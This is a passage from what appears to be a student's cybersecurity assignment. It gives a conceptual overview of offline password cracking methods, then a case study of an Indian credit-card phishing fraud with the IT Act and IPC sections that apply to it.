the Security Account Manager (SAM) file on Windows, or the /etc/shadow file on Linux. In
most cases, Offline Password Cracking will require that an attacker has already attained
administrator/root level privileges on the system to get to the storage mechanism. It is possible,
however, that the password hashes could also have been pulled directly from a database using
SQL injection, an unprotected flat text file on a web server, or some other poorly protected
source.
The main offline password cracking methods are:
1. Dictionary Attacks
2. Brute-Force Attacks
3. Rainbow Attacks

Brute-Force Attacks:
In this type of attack, the hacker tries to determine the password by trying every possible
combination of characters. The number of attempts get restricted by the number of characters
and maximum length that is to be tried per position (or a byte if we are considering Unicode
passwords too).

The time taken to complete is relatively more, but there are more chances of coverage
of likely clear text value (all possibilities only if set to the maximum length and every possible
character is considered in every position). It is like a combination lock which requires three
numbers to be taken in sequence; one tries every possible combination - e.g., First 1-2-3, then
1-2-4.

A brute force attack may not try all options in sequential order. An advanced brute force
attack can make certain assumptions like complexity rules require uppercase, first character
more likely to be upper than lower case.

Sign: _______ _ _ __

200090107060
 Case Study

Online credit-card fraud:

First credit-card fraud in India

PANCHKULA: A Panchkula woman was duped of Rs 1 lakh when she requested online closure
of her credit card. Police have registered a case in this regard.

A complaint was given to the police by Roopsi Sehgal, a resident of Sector 6. In her complaint
to the police, she stated that she used credit card of SBI Bank and received one phone call from
an unknown person, who claimed to be a representative of the bank and called to take her
queries related to the credit card.The victim told him that she wanted to get her credit card
closed and the caller sent her an online link and asked her to fill all personal details in it. When
victim opened the link and entered her bank and credit card details in it, she received on OTP
and when she shared that OTP in the link, transaction of Rs 99,666 took place from her credit
card.

List of Laws against online credit-card fraud:

1. Section 66C IT act, 2000

Section 66C says ―Whoever tries to make use of any electronic password fraudulently
or dishonestly shall be punished with imprisonment up to three years and a fine up to one lakh
rupees.‖

2. Section 66D IT act, 2000

Section 66D says ―Whoever by any device tries to do cheating by personation shall
be punished with imprisonment up to three years and a fine up to one lakh rupees‖

3. Section 468 of IPC

Section 468 says ―Whoever commits forgery for the purpose of cheating shall be
punished with imprisonment up to seven years and shall also be liable to fine.‖

4. Section 471 of IPC

Section 471 says ―Whoever by fraudulently or dishonestly uses a document which he
knows to be false shall be punished with the same punishment as if he has forged such
document.‖

200090107060
5. Section 420 of IPC
Cheating and dishonestly inducing delivery of property.—Whoever cheats and
thereby dishonestly induces the person deceived to deliver any property to any person, or to
make, alter or destroy the whole or any part of a valuable security, or anything which is signed
or sealed, and which is capable of being converted into a valuable security, shall be punished
with imprisonment of either description for a term which may extend to seven years, and shall
also be liable to fine.

Note:
If anyone‘s credit card has been lost/stolen and someone makes any transactions he‘ll
be liable under these sections. The person has to file an FIR in the nearby police station. The
evidence, in this case, would be the account statement. Rest of the evidence like the IP address
of the fraud doer will be collected by the police in its investigation. The bank has the log details
of the credit card transactions which help the police in its investigation. Based on the log details
(IP address), it would trace the criminals.

Sign: _______ _ _ __

200090107060